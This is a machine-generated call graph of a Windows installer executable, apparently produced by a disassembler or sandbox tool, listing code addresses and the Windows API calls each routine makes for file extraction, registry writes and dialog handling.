4717->4718 4720 40145c 18 API calls 4717->4720 4719 402963 4718->4719 4721 401446 18 API calls 4718->4721 4723 4029ae RegSetValueExW 4719->4723 4726 40337f 33 API calls 4719->4726 4724 4028fc lstrlenW 4720->4724 4725 402947 4721->4725 4729 4029c6 RegCloseKey 4723->4729 4730 4029cb 4723->4730 4727 402918 4724->4727 4728 40292a 4724->4728 4732 4062cf 11 API calls 4725->4732 4733 40297b 4726->4733 4734 4062cf 11 API calls 4727->4734 4735 4062cf 11 API calls 4728->4735 4729->4722 4731 4062cf 11 API calls 4730->4731 4731->4729 4732->4719 4741 406250 4733->4741 4738 402922 4734->4738 4735->4718 4738->4723 4740 4062cf 11 API calls 4740->4738 4742 406273 4741->4742 4743 4062b6 4742->4743 4744 406288 wsprintfW 4742->4744 4745 402991 4743->4745 4746 4062bf lstrcatW 4743->4746 4744->4743 4744->4744 4745->4740 4746->4745 4747 403d02 4748 403d0d 4747->4748 4749 403d11 4748->4749 4750 403d14 GlobalAlloc 4748->4750 4750->4749 4751 402082 4752 401446 18 API calls 4751->4752 4753 402093 SetWindowLongW 4752->4753 4754 4030e3 4753->4754 4755 402a84 4756 401553 19 API calls 4755->4756 4757 402a8e 4756->4757 4758 401446 18 API calls 4757->4758 4759 402a98 4758->4759 4760 401a13 4759->4760 4761 402ab2 RegEnumKeyW 4759->4761 4762 402abe RegEnumValueW 4759->4762 4763 402a7e 4761->4763 4762->4760 4762->4763 4763->4760 4764 4029e4 RegCloseKey 4763->4764 4764->4760 4765 402c8a 4766 402ca2 4765->4766 4767 402c8f 4765->4767 4769 40145c 18 API calls 4766->4769 4768 401446 18 API calls 4767->4768 4771 402c97 4768->4771 4770 402ca9 lstrlenW 4769->4770 4770->4771 4772 401a13 4771->4772 4773 402ccb WriteFile 4771->4773 4773->4772 4774 401d8e 4775 40145c 18 API calls 4774->4775 4776 401d95 ExpandEnvironmentStringsW 4775->4776 4777 401da8 4776->4777 4778 401db9 4776->4778 4777->4778 4779 401dad lstrcmpW 4777->4779 4779->4778 4780 401e0f 4781 401446 18 API calls 4780->4781 4782 401e17 4781->4782 4783 401446 18 API calls 4782->4783 4784 401e21 4783->4784 4785 4030e3 4784->4785 4787 405f7d wsprintfW 4784->4787 4787->4785 4788 40438f 4789 4043c8 4788->4789 4790 40439f 4788->4790 4791 403df6 8 API calls 4789->4791 4792 403d6b 19 API calls 4790->4792 4794 4043d4 4791->4794 4793 4043ac SetDlgItemTextW 4792->4793 4793->4789 4795 403f90 4796 403fa0 4795->4796 4797 403fbc 4795->4797 4806 405cb0 GetDlgItemTextW 4796->4806 4799 403fc2 SHGetPathFromIDListW 4797->4799 4800 403fef 4797->4800 4802 403fd2 4799->4802 4805 403fd9 SendMessageW 4799->4805 4801 403fad SendMessageW 4801->4797 4803 40141d 80 API calls 4802->4803 4803->4805 4805->4800 4806->4801 4807 402392 4808 40145c 18 API calls 4807->4808 4809 402399 4808->4809 4812 407224 4809->4812 4813 406efe 25 API calls 4812->4813 4814 407244 4813->4814 4815 4023a7 4814->4815 4816 40724e lstrcpynW lstrcmpW 4814->4816 4817 407280 4816->4817 4818 407286 lstrcpynW 4816->4818 4817->4818 4818->4815 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3402 406113 3360->3402 3379 40683e 3363->3379 3364 406aab 3365 401488 3364->3365 3397 406035 lstrcpynW 3364->3397 3365->3358 3381 406064 3365->3381 3367 4068ff GetVersion 3367->3379 3368 406a72 lstrlenW 3368->3379 3370 406831 10 API calls 3370->3368 3373 40697e GetSystemDirectoryW 3373->3379 3374 406064 5 API calls 3374->3379 3375 406991 GetWindowsDirectoryW 3375->3379 3376 406831 10 API calls 3376->3379 3377 406a0b lstrcatW 3377->3379 3378 4069c5 SHGetSpecialFolderLocation 3378->3379 3380 4069dd SHGetPathFromIDListW CoTaskMemFree 3378->3380 3379->3364 3379->3367 3379->3368 3379->3370 3379->3373 3379->3374 3379->3375 3379->3376 3379->3377 3379->3378 3390 405eff RegOpenKeyExW 3379->3390 3395 405f7d wsprintfW 3379->3395 3396 406035 lstrcpynW 3379->3396 3380->3379 3388 406071 3381->3388 3382 4060e7 3383 4060ed CharPrevW 3382->3383 3385 40610d 3382->3385 3383->3382 3384 4060da CharNextW 3384->3382 3384->3388 3385->3358 3387 4060c6 CharNextW 3387->3388 3388->3382 3388->3384 3388->3387 3389 4060d5 CharNextW 3388->3389 3398 405d32 3388->3398 3389->3384 3391 405f33 RegQueryValueExW 3390->3391 3392 405f78 3390->3392 3393 405f55 RegCloseKey 3391->3393 3392->3379 3393->3392 3395->3379 3396->3379 3397->3365 3399 405d38 3398->3399 3400 405d4e 3399->3400 3401 405d3f CharNextW 3399->3401 3400->3388 3401->3399 3403 40613c 3402->3403 3404 40611f 3402->3404 3406 4061b3 3403->3406 3407 406159 3403->3407 3408 40277f WritePrivateProfileStringW 3403->3408 3405 406129 CloseHandle 3404->3405 3404->3408 3405->3408 3406->3408 3409 4061bc lstrcatW lstrlenW WriteFile 3406->3409 3407->3409 3410 406162 GetFileAttributesW 3407->3410 3409->3408 3415 405e7c GetFileAttributesW CreateFileW 3410->3415 3412 40617e 3412->3408 3413 4061a8 SetFilePointer 3412->3413 3414 40618e WriteFile 3412->3414 3413->3406 3414->3413 3415->3412 4819 402797 4820 40145c 18 API calls 4819->4820 4821 4027ae 4820->4821 4822 40145c 18 API calls 4821->4822 4823 4027b7 4822->4823 4824 40145c 18 API calls 4823->4824 4825 4027c0 GetPrivateProfileStringW lstrcmpW 4824->4825 4826 401e9a 4827 40145c 18 API calls 4826->4827 4828 401ea1 4827->4828 4829 401446 18 API calls 4828->4829 4830 401eab wsprintfW 4829->4830 3790 401a1f 3791 40145c 18 API calls 3790->3791 3792 401a26 3791->3792 3793 4062cf 11 API calls 3792->3793 3794 401a49 3793->3794 3795 401a64 3794->3795 3796 401a5c 3794->3796 3865 406035 lstrcpynW 3795->3865 3864 406035 lstrcpynW 3796->3864 3799 401a6f 3866 40674e lstrlenW CharPrevW 3799->3866 3800 401a62 3803 406064 5 API calls 3800->3803 3834 401a81 3803->3834 3804 406301 2 API calls 3804->3834 3807 401a98 CompareFileTime 3807->3834 3808 401ba9 3809 404f9e 25 API calls 3808->3809 3811 401bb3 3809->3811 3810 401b5d 3812 404f9e 25 API calls 3810->3812 3843 40337f 3811->3843 3814 401b70 3812->3814 3818 4062cf 11 API calls 3814->3818 3816 406035 lstrcpynW 3816->3834 3817 4062cf 11 API calls 3819 401bda 3817->3819 3823 401b8b 3818->3823 3820 401be9 SetFileTime 3819->3820 3821 401bf8 CloseHandle 3819->3821 3820->3821 3821->3823 3824 401c09 3821->3824 3822 406831 18 API calls 3822->3834 3825 401c21 3824->3825 3826 401c0e 3824->3826 3827 406831 18 API calls 3825->3827 3828 406831 18 API calls 3826->3828 3829 401c29 3827->3829 3831 401c16 lstrcatW 3828->3831 3832 4062cf 11 API calls 3829->3832 3831->3829 3835 401c34 3832->3835 3833 401b50 3837 401b93 3833->3837 3838 401b53 3833->3838 3834->3804 3834->3807 3834->3808 3834->3810 3834->3816 3834->3822 3834->3833 3836 4062cf 11 API calls 3834->3836 3842 405e7c GetFileAttributesW CreateFileW 3834->3842 3869 405e5c GetFileAttributesW 3834->3869 3872 405ccc 3834->3872 3839 405ccc MessageBoxIndirectW 3835->3839 3836->3834 3840 4062cf 11 API calls 3837->3840 3841 4062cf 11 API calls 3838->3841 3839->3823 3840->3823 3841->3810 3842->3834 3844 40339a 3843->3844 3845 4033c7 3844->3845 3878 403368 SetFilePointer 3844->3878 3876 403336 ReadFile 3845->3876 3849 401bc6 3849->3817 3850 403546 3852 40354a 3850->3852 3853 40356e 3850->3853 3851 4033eb GetTickCount 3851->3849 3856 403438 3851->3856 3854 403336 ReadFile 3852->3854 3853->3849 3857 403336 ReadFile 3853->3857 3858 40358d WriteFile 3853->3858 3854->3849 3855 403336 ReadFile 3855->3856 3856->3849 3856->3855 3860 40348a GetTickCount 3856->3860 3861 4034af MulDiv wsprintfW 3856->3861 3863 4034f3 WriteFile 3856->3863 3857->3853 3858->3849 3859 4035a1 3858->3859 3859->3849 3859->3853 3860->3856 3862 404f9e 25 API calls 3861->3862 3862->3856 3863->3849 3863->3856 3864->3800 3865->3799 3867 401a75 lstrcatW 3866->3867 3868 40676b lstrcatW 3866->3868 3867->3800 3868->3867 3870 405e79 3869->3870 3871 405e6b SetFileAttributesW 3869->3871 3870->3834 3871->3870 3873 405ce1 3872->3873 3874 405d2f 3873->3874 3875 405cf7 MessageBoxIndirectW 3873->3875 3874->3834 3875->3874 3877 403357 3876->3877 3877->3849 3877->3850 3877->3851 3878->3845 4831 40209f GetDlgItem GetClientRect 4832 40145c 18 API calls 4831->4832 4833 4020cf LoadImageW SendMessageW 4832->4833 4834 4030e3 4833->4834 4835 4020ed DeleteObject 4833->4835 4835->4834 4836 402b9f 4837 401446 18 API calls 4836->4837 4841 402ba7 4837->4841 4838 402c4a 4839 402bdf ReadFile 4839->4841 4848 402c3d 4839->4848 4840 401446 18 API calls 4840->4848 4841->4838 4841->4839 4842 402c06 MultiByteToWideChar 4841->4842 4843 402c3f 4841->4843 4844 402c4f 4841->4844 4841->4848 4842->4841 4842->4844 4849 405f7d wsprintfW 4843->4849 4846 402c6b SetFilePointer 4844->4846 4844->4848 4846->4848 4847 402d17 ReadFile 4847->4848 4848->4838 4848->4840 4848->4847 4849->4838 4850 402b23 GlobalAlloc 4851 402b39 4850->4851 4852 402b4b 4850->4852 4853 401446 18 API calls 4851->4853 4854 40145c 18 API calls 4852->4854 4856 402b41 4853->4856 4855 402b52 WideCharToMultiByte lstrlenA 4854->4855 4855->4856 4857 402b84 WriteFile 4856->4857 4858 402b93 4856->4858 4857->4858 4859 402384 GlobalFree 4857->4859 4859->4858 4861 4040a3 4862 4040b0 lstrcpynW lstrlenW 4861->4862 4863 4040ad 4861->4863 4863->4862 3429 4054a5 3430 4055f9 3429->3430 3431 4054bd 3429->3431 3433 40564a 3430->3433 3434 40560a GetDlgItem GetDlgItem 3430->3434 3431->3430 3432 4054c9 3431->3432 3436 4054d4 SetWindowPos 3432->3436 3437 4054e7 3432->3437 3435 4056a4 3433->3435 3443 40139d 80 API calls 3433->3443 3438 403d6b 19 API calls 3434->3438 3444 4055f4 3435->3444 3499 403ddb 3435->3499 3436->3437 3440 405504 3437->3440 3441 4054ec ShowWindow 3437->3441 3442 405634 SetClassLongW 3438->3442 3445 405526 3440->3445 3446 40550c DestroyWindow 3440->3446 3441->3440 3447 40141d 80 API calls 3442->3447 3450 40567c 3443->3450 3448 40552b SetWindowLongW 3445->3448 3449 40553c 3445->3449 3451 405908 3446->3451 3447->3433 3448->3444 3452 4055e5 3449->3452 3453 405548 GetDlgItem 3449->3453 3450->3435 3454 405680 SendMessageW 3450->3454 3451->3444 3460 405939 ShowWindow 3451->3460 3519 403df6 3452->3519 3457 405578 3453->3457 3458 40555b SendMessageW IsWindowEnabled 3453->3458 3454->3444 3455 40141d 80 API calls 3468 4056b6 3455->3468 3456 40590a DestroyWindow KiUserCallbackDispatcher 3456->3451 3462 405585 3457->3462 3465 4055cc SendMessageW 3457->3465 3466 405598 3457->3466 3474 40557d 3457->3474 3458->3444 3458->3457 3460->3444 3461 406831 18 API calls 3461->3468 3462->3465 3462->3474 3464 403d6b 19 API calls 3464->3468 3465->3452 3469 4055a0 3466->3469 3470 4055b5 3466->3470 3467 4055b3 3467->3452 3468->3444 3468->3455 3468->3456 3468->3461 3468->3464 3490 40584a DestroyWindow 3468->3490 3502 403d6b 3468->3502 3513 40141d 3469->3513 3471 40141d 80 API calls 3470->3471 3473 4055bc 3471->3473 3473->3452 3473->3474 3516 403d44 3474->3516 3476 405731 GetDlgItem 3477 405746 3476->3477 3478 40574f ShowWindow KiUserCallbackDispatcher 3476->3478 3477->3478 3505 403db1 KiUserCallbackDispatcher 3478->3505 3480 405779 EnableWindow 3483 40578d 3480->3483 3481 405792 GetSystemMenu EnableMenuItem SendMessageW 3482 4057c2 SendMessageW 3481->3482 3481->3483 3482->3483 3483->3481 3506 403dc4 SendMessageW 3483->3506 3507 406035 lstrcpynW 3483->3507 3486 4057f0 lstrlenW 3487 406831 18 API calls 3486->3487 3488 405806 SetWindowTextW 3487->3488 3508 40139d 3488->3508 3490->3451 3491 405864 CreateDialogParamW 3490->3491 3491->3451 3492 405897 3491->3492 3493 403d6b 19 API calls 3492->3493 3494 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3493->3494 3495 40139d 80 API calls 3494->3495 3496 4058e8 3495->3496 3496->3444 3497 4058f0 ShowWindow 3496->3497 3498 403ddb SendMessageW 3497->3498 3498->3451 3500 403df3 3499->3500 3501 403de4 SendMessageW 3499->3501 3500->3468 3501->3500 3503 406831 18 API calls 3502->3503 3504 403d76 SetDlgItemTextW 3503->3504 3504->3476 3505->3480 3506->3483 3507->3486 3511 4013a4 3508->3511 3509 401410 3509->3468 3511->3509 3512 4013dd MulDiv SendMessageW 3511->3512 3533 4015a0 3511->3533 3512->3511 3514 40139d 80 API calls 3513->3514 3515 401432 3514->3515 3515->3474 3517 403d51 SendMessageW 3516->3517 3518 403d4b 3516->3518 3517->3467 3518->3517 3520 403e0b GetWindowLongW 3519->3520 3530 403e94 3519->3530 3521 403e1c 3520->3521 3520->3530 3522 403e2b GetSysColor 3521->3522 3523 403e2e 3521->3523 3522->3523 3524 403e34 SetTextColor 3523->3524 3525 403e3e SetBkMode 3523->3525 3524->3525 3526 403e56 GetSysColor 3525->3526 3527 403e5c 3525->3527 3526->3527 3528 403e63 SetBkColor 3527->3528 3529 403e6d 3527->3529 3528->3529 3529->3530 3531 403e80 DeleteObject 3529->3531 3532 403e87 CreateBrushIndirect 3529->3532 3530->3444 3531->3532 3532->3530 3534 4015fa 3533->3534 3613 40160c 3533->3613 3535 401601 3534->3535 3536 401742 3534->3536 3537 401962 3534->3537 3538 4019ca 3534->3538 3539 40176e 3534->3539 3540 401650 3534->3540 3541 4017b1 3534->3541 3542 401672 3534->3542 3543 401693 3534->3543 3544 401616 3534->3544 3545 4016d6 3534->3545 3546 401736 3534->3546 3547 401897 3534->3547 3548 4018db 3534->3548 3549 40163c 3534->3549 3550 4016bd 3534->3550 3534->3613 3559 4062cf 11 API calls 3535->3559 3551 401751 ShowWindow 3536->3551 3552 401758 3536->3552 3556 40145c 18 API calls 3537->3556 3563 40145c 18 API calls 3538->3563 3553 40145c 18 API calls 3539->3553 3577 4062cf 11 API calls 3540->3577 3557 40145c 18 API calls 3541->3557 3554 40145c 18 API calls 3542->3554 3558 401446 18 API calls 3543->3558 3562 40145c 18 API calls 3544->3562 3576 401446 18 API calls 3545->3576 3545->3613 3546->3613 3667 405f7d wsprintfW 3546->3667 3555 40145c 18 API calls 3547->3555 3560 40145c 18 API calls 3548->3560 3564 401647 PostQuitMessage 3549->3564 3549->3613 3561 4062cf 11 API calls 3550->3561 3551->3552 3565 401765 ShowWindow 3552->3565 3552->3613 3566 401775 3553->3566 3567 401678 3554->3567 3568 40189d 3555->3568 3569 401968 GetFullPathNameW 3556->3569 3570 4017b8 3557->3570 3571 40169a 3558->3571 3559->3613 3572 4018e2 3560->3572 3573 4016c7 SetForegroundWindow 3561->3573 3574 40161c 3562->3574 3575 4019d1 SearchPathW 3563->3575 3564->3613 3565->3613 3579 4062cf 11 API calls 3566->3579 3580 4062cf 11 API calls 3567->3580 3658 406301 FindFirstFileW 3568->3658 3582 4019a1 3569->3582 3583 40197f 3569->3583 3584 4062cf 11 API calls 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 40145c 18 API calls 3572->3586 3573->3613 3587 4062cf 11 API calls 3574->3587 3575->3546 3575->3613 3576->3613 3588 401664 3577->3588 3589 401785 SetFileAttributesW 3579->3589 3590 401683 3580->3590 3602 4019b8 GetShortPathNameW 3582->3602 3582->3613 3583->3582 3608 406301 2 API calls 3583->3608 3592 4017c9 3584->3592 3593 4016a7 Sleep 3585->3593 3594 4018eb 3586->3594 3595 401627 3587->3595 3596 40139d 65 API calls 3588->3596 3597 40179a 3589->3597 3589->3613 3606 404f9e 25 API calls 3590->3606 3640 405d85 CharNextW CharNextW 3592->3640 3593->3613 3603 40145c 18 API calls 3594->3603 3604 404f9e 25 API calls 3595->3604 3596->3613 3605 4062cf 11 API calls 3597->3605 3598 4018c2 3609 4062cf 11 API calls 3598->3609 3599 4018a9 3607 4062cf 11 API calls 3599->3607 3602->3613 3611 4018f5 3603->3611 3604->3613 3605->3613 3606->3613 3607->3613 3612 401991 3608->3612 3609->3613 3610 4017d4 3614 401864 3610->3614 3617 405d32 CharNextW 3610->3617 3635 4062cf 11 API calls 3610->3635 3615 4062cf 11 API calls 3611->3615 3612->3582 3666 406035 lstrcpynW 3612->3666 3613->3511 3614->3590 3616 40186e 3614->3616 3618 401902 MoveFileW 3615->3618 3646 404f9e 3616->3646 3621 4017e6 CreateDirectoryW 3617->3621 3622 401912 3618->3622 3623 40191e 3618->3623 3621->3610 3625 4017fe GetLastError 3621->3625 3622->3590 3629 406301 2 API calls 3623->3629 3639 401942 3623->3639 3627 401827 GetFileAttributesW 3625->3627 3628 40180b GetLastError 3625->3628 3627->3610 3632 4062cf 11 API calls 3628->3632 3633 401929 3629->3633 3630 401882 SetCurrentDirectoryW 3630->3613 3631 4062cf 11 API calls 3634 40195c 3631->3634 3632->3610 3633->3639 3661 406c94 3633->3661 3634->3613 3635->3610 3638 404f9e 25 API calls 3638->3639 3639->3631 3641 405da2 3640->3641 3644 405db4 3640->3644 3643 405daf CharNextW 3641->3643 3641->3644 3642 405dd8 3642->3610 3643->3642 3644->3642 3645 405d32 CharNextW 3644->3645 3645->3644 3647 404fb7 3646->3647 3648 401875 3646->3648 3649 404fd5 lstrlenW 3647->3649 3650 406831 18 API calls 3647->3650 3657 406035 lstrcpynW 3648->3657 3651 404fe3 lstrlenW 3649->3651 3652 404ffe 3649->3652 3650->3649 3651->3648 3653 404ff5 lstrcatW 3651->3653 3654 405011 3652->3654 3655 405004 SetWindowTextW 3652->3655 3653->3652 3654->3648 3656 405017 SendMessageW SendMessageW SendMessageW 3654->3656 3655->3654 3656->3648 3657->3630 3659 4018a5 3658->3659 3660 406317 FindClose 3658->3660 3659->3598 3659->3599 3660->3659 3668 406328 GetModuleHandleA 3661->3668 3665 401936 3665->3638 3666->3582 3667->3613 3669 406340 LoadLibraryA 3668->3669 3670 40634b GetProcAddress 3668->3670 3669->3670 3671 406359 3669->3671 3670->3671 3671->3665 3672 406ac5 lstrcpyW 3671->3672 3673 406b13 GetShortPathNameW 3672->3673 3674 406aea 3672->3674 3675 406b2c 3673->3675 3676 406c8e 3673->3676 3698 405e7c GetFileAttributesW CreateFileW 3674->3698 3675->3676 3679 406b34 WideCharToMultiByte 3675->3679 3676->3665 3678 406af3 CloseHandle GetShortPathNameW 3678->3676 3680 406b0b 3678->3680 3679->3676 3681 406b51 WideCharToMultiByte 3679->3681 3680->3673 3680->3676 3681->3676 3682 406b69 wsprintfA 3681->3682 3683 406831 18 API calls 3682->3683 3684 406b95 3683->3684 3699 405e7c GetFileAttributesW CreateFileW 3684->3699 3686 406ba2 3686->3676 3687 406baf GetFileSize GlobalAlloc 3686->3687 3688 406bd0 ReadFile 3687->3688 3689 406c84 CloseHandle 3687->3689 3688->3689 3690 406bea 3688->3690 3689->3676 3690->3689 3700 405de2 lstrlenA 3690->3700 3693 406c03 lstrcpyA 3696 406c25 3693->3696 3694 406c17 3695 405de2 4 API calls 3694->3695 3695->3696 3697 406c5c SetFilePointer WriteFile GlobalFree 3696->3697 3697->3689 3698->3678 3699->3686 3701 405e23 lstrlenA 3700->3701 3702 405e2b 3701->3702 3703 405dfc lstrcmpiA 3701->3703 3702->3693 3702->3694 3703->3702 3704 405e1a CharNextA 3703->3704 3704->3701 4864 402da5 4865 4030e3 4864->4865 4866 402dac 4864->4866 4867 401446 18 API calls 4866->4867 4868 402db8 4867->4868 4869 402dbf SetFilePointer 4868->4869 4869->4865 4870 402dcf 4869->4870 4870->4865 4872 405f7d wsprintfW 4870->4872 4872->4865 4873 4049a8 GetDlgItem GetDlgItem 4874 4049fe 7 API calls 4873->4874 4879 404c16 4873->4879 4875 404aa2 DeleteObject 4874->4875 4876 404a96 SendMessageW 4874->4876 4877 404aad 4875->4877 4876->4875 4880 404ae4 4877->4880 4883 406831 18 API calls 4877->4883 4878 404cfb 4881 404da0 4878->4881 4882 404c09 4878->4882 4887 404d4a SendMessageW 4878->4887 4879->4878 4891 40487a 5 API calls 4879->4891 4904 404c86 4879->4904 4886 403d6b 19 API calls 4880->4886 4884 404db5 4881->4884 4885 404da9 SendMessageW 4881->4885 4888 403df6 8 API calls 4882->4888 4889 404ac6 SendMessageW SendMessageW 4883->4889 4896 404dc7 ImageList_Destroy 4884->4896 4897 404dce 4884->4897 4902 404dde 4884->4902 4885->4884 4892 404af8 4886->4892 4887->4882 4894 404d5f SendMessageW 4887->4894 4895 404f97 4888->4895 4889->4877 4890 404ced SendMessageW 4890->4878 4891->4904 4898 403d6b 19 API calls 4892->4898 4893 404f48 4893->4882 4903 404f5d ShowWindow GetDlgItem ShowWindow 4893->4903 4899 404d72 4894->4899 4896->4897 4900 404dd7 GlobalFree 4897->4900 4897->4902 4906 404b09 4898->4906 4908 404d83 SendMessageW 4899->4908 4900->4902 4901 404bd6 GetWindowLongW SetWindowLongW 4905 404bf0 4901->4905 4902->4893 4907 40141d 80 API calls 4902->4907 4917 404e10 4902->4917 4903->4882 4904->4878 4904->4890 4909 404bf6 ShowWindow 4905->4909 4910 404c0e 4905->4910 4906->4901 4912 404b65 SendMessageW 4906->4912 4913 404bd0 4906->4913 4915 404b93 SendMessageW 4906->4915 4916 404ba7 SendMessageW 4906->4916 4907->4917 4908->4881 4924 403dc4 SendMessageW 4909->4924 4925 403dc4 SendMessageW 4910->4925 4912->4906 4913->4901 4913->4905 4915->4906 4916->4906 4918 404e54 4917->4918 4921 404e3e SendMessageW 4917->4921 4919 404f1f InvalidateRect 4918->4919 4923 404ecd SendMessageW SendMessageW 4918->4923 4919->4893 4920 404f35 4919->4920 4922 4043d9 21 API calls 4920->4922 4921->4918 4922->4893 4923->4918 4924->4882 4925->4879 4926 4030a9 SendMessageW 4927 4030c2 InvalidateRect 4926->4927 4928 4030e3 4926->4928 4927->4928 3879 4038af #17 SetErrorMode OleInitialize 3880 406328 3 API calls 3879->3880 3881 4038f2 SHGetFileInfoW 3880->3881 3953 406035 lstrcpynW 3881->3953 3883 40391d GetCommandLineW 3954 406035 lstrcpynW 3883->3954 3885 40392f GetModuleHandleW 3886 403947 3885->3886 3887 405d32 CharNextW 3886->3887 3888 403956 CharNextW 3887->3888 3899 403968 3888->3899 3889 403a02 3890 403a21 GetTempPathW 3889->3890 3955 4037f8 3890->3955 3892 403a37 3894 403a3b GetWindowsDirectoryW lstrcatW 3892->3894 3895 403a5f DeleteFileW 3892->3895 3893 405d32 CharNextW 3893->3899 3897 4037f8 11 API calls 3894->3897 3963 4035b3 GetTickCount GetModuleFileNameW 3895->3963 3900 403a57 3897->3900 3898 403a73 3901 403af8 3898->3901 3903 405d32 CharNextW 3898->3903 3939 403add 3898->3939 3899->3889 3899->3893 3906 403a04 3899->3906 3900->3895 3900->3901 4048 403885 3901->4048 3907 403a8a 3903->3907 4055 406035 lstrcpynW 3906->4055 3918 403b23 lstrcatW lstrcmpiW 3907->3918 3919 403ab5 3907->3919 3908 403aed 3911 406113 9 API calls 3908->3911 3909 403bfa 3912 403c7d 3909->3912 3914 406328 3 API calls 3909->3914 3910 403b0d 3913 405ccc MessageBoxIndirectW 3910->3913 3911->3901 3915 403b1b ExitProcess 3913->3915 3917 403c09 3914->3917 3921 406328 3 API calls 3917->3921 3918->3901 3920 403b3f CreateDirectoryW SetCurrentDirectoryW 3918->3920 4056 4067aa 3919->4056 3923 403b62 3920->3923 3924 403b57 3920->3924 3925 403c12 3921->3925 4073 406035 lstrcpynW 3923->4073 4072 406035 lstrcpynW 3924->4072 3929 406328 3 API calls 3925->3929 3932 403c1b 3929->3932 3931 403b70 4074 406035 lstrcpynW 3931->4074 3933 403c69 ExitWindowsEx 3932->3933 3938 403c29 GetCurrentProcess 3932->3938 3933->3912 3937 403c76 3933->3937 3934 403ad2 4071 406035 lstrcpynW 3934->4071 3940 40141d 80 API calls 3937->3940 3942 403c39 3938->3942 3991 405958 3939->3991 3940->3912 3941 406831 18 API calls 3943 403b98 DeleteFileW 3941->3943 3942->3933 3944 403ba5 CopyFileW 3943->3944 3950 403b7f 3943->3950 3944->3950 3945 403bee 3946 406c94 42 API calls 3945->3946 3948 403bf5 3946->3948 3947 406c94 42 API calls 3947->3950 3948->3901 3949 406831 18 API calls 3949->3950 3950->3941 3950->3945 3950->3947 3950->3949 3952 403bd9 CloseHandle 3950->3952 4075 405c6b CreateProcessW 3950->4075 3952->3950 3953->3883 3954->3885 3956 406064 5 API calls 3955->3956 3957 403804 3956->3957 3958 40380e 3957->3958 3959 40674e 3 API calls 3957->3959 3958->3892 3960 403816 CreateDirectoryW 3959->3960 3961 405eab 2 API calls 3960->3961 3962 40382a 3961->3962 3962->3892 4078 405e7c GetFileAttributesW CreateFileW 3963->4078 3965 4035f3 3985 403603 3965->3985 4079 406035 lstrcpynW 3965->4079 3967 403619 4080 40677d lstrlenW 3967->4080 3971 40362a GetFileSize 3972 403726 3971->3972 3986 403641 3971->3986 4085 4032d2 3972->4085 3974 40372f 3976 40376b GlobalAlloc 3974->3976 3974->3985 4097 403368 SetFilePointer 3974->4097 3975 403336 ReadFile 3975->3986 4096 403368 SetFilePointer 3976->4096 3979 4037e9 3982 4032d2 6 API calls 3979->3982 3980 403786 3983 40337f 33 API calls 3980->3983 3981 40374c 3984 403336 ReadFile 3981->3984 3982->3985 3989 403792 3983->3989 3988 403757 3984->3988 3985->3898 3986->3972 3986->3975 3986->3979 3986->3985 3987 4032d2 6 API calls 3986->3987 3987->3986 3988->3976 3988->3985 3989->3985 3989->3989 3990 4037c0 SetFilePointer 3989->3990 3990->3985 3992 406328 3 API calls 3991->3992 3993 40596c 3992->3993 3994 405972 3993->3994 3995 405984 3993->3995 4111 405f7d wsprintfW 3994->4111 3996 405eff 3 API calls 3995->3996 3997 4059b5 3996->3997 3999 4059d4 lstrcatW 3997->3999 4001 405eff 3 API calls 3997->4001 4000 405982 3999->4000 4102 403ec1 4000->4102 4001->3999 4004 4067aa 18 API calls 4005 405a06 4004->4005 4006 405a9c 4005->4006 4008 405eff 3 API calls 4005->4008 4007 4067aa 18 API calls 4006->4007 4009 405aa2 4007->4009 4010 405a38 4008->4010 4011 405ab2 4009->4011 4012 406831 18 API calls 4009->4012 4010->4006 4014 405a5b lstrlenW 4010->4014 4017 405d32 CharNextW 4010->4017 4013 405ad2 LoadImageW 4011->4013 4113 403ea0 4011->4113 4012->4011 4015 405b92 4013->4015 4016 405afd RegisterClassW 4013->4016 4018 405a69 lstrcmpiW 4014->4018 4019 405a8f 4014->4019 4023 40141d 80 API calls 4015->4023 4021 405b9c 4016->4021 4022 405b45 SystemParametersInfoW CreateWindowExW 4016->4022 4024 405a56 4017->4024 4018->4019 4025 405a79 GetFileAttributesW 4018->4025 4027 40674e 3 API calls 4019->4027 4021->3908 4022->4015 4028 405b98 4023->4028 4024->4014 4029 405a85 4025->4029 4026 405ac8 4026->4013 4030 405a95 4027->4030 4028->4021 4031 403ec1 19 API calls 4028->4031 4029->4019 4032 40677d 2 API calls 4029->4032 4112 406035 lstrcpynW 4030->4112 4034 405ba9 4031->4034 4032->4019 4035 405bb5 ShowWindow LoadLibraryW 4034->4035 4036 405c38 4034->4036 4037 405bd4 LoadLibraryW 4035->4037 4038 405bdb GetClassInfoW 4035->4038 4039 405073 83 API calls 4036->4039 4037->4038 4040 405c05 DialogBoxParamW 4038->4040 4041 405bef GetClassInfoW RegisterClassW 4038->4041 4042 405c3e 4039->4042 4045 40141d 80 API calls 4040->4045 4041->4040 4043 405c42 4042->4043 4044 405c5a 4042->4044 4043->4021 4047 40141d 80 API calls 4043->4047 4046 40141d 80 API calls 4044->4046 4045->4021 4046->4021 4047->4021 4049 40389d 4048->4049 4050 40388f CloseHandle 4048->4050 4120 403caf 4049->4120 4050->4049 4055->3890 4173 406035 lstrcpynW 4056->4173 4058 4067bb 4059 405d85 4 API calls 4058->4059 4060 4067c1 4059->4060 4061 406064 5 API calls 4060->4061 4068 403ac3 4060->4068 4064 4067d1 4061->4064 4062 406809 lstrlenW 4063 406810 4062->4063 4062->4064 4066 40674e 3 API calls 4063->4066 4064->4062 4065 406301 2 API calls 4064->4065 4064->4068 4069 40677d 2 API calls 4064->4069 4065->4064 4067 406816 GetFileAttributesW 4066->4067 4067->4068 4068->3901 4070 406035 lstrcpynW 4068->4070 4069->4062 4070->3934 4071->3939 4072->3923 4073->3931 4074->3950 4076 405ca6 4075->4076 4077 405c9a CloseHandle 4075->4077 4076->3950 4077->4076 4078->3965 4079->3967 4081 40678c 4080->4081 4082 406792 CharPrevW 4081->4082 4083 40361f 4081->4083 4082->4081 4082->4083 4084 406035 lstrcpynW 4083->4084 4084->3971 4086 4032f3 4085->4086 4087 4032db 4085->4087 4090 403303 GetTickCount 4086->4090 4091 4032fb 4086->4091 4088 4032e4 DestroyWindow 4087->4088 4089 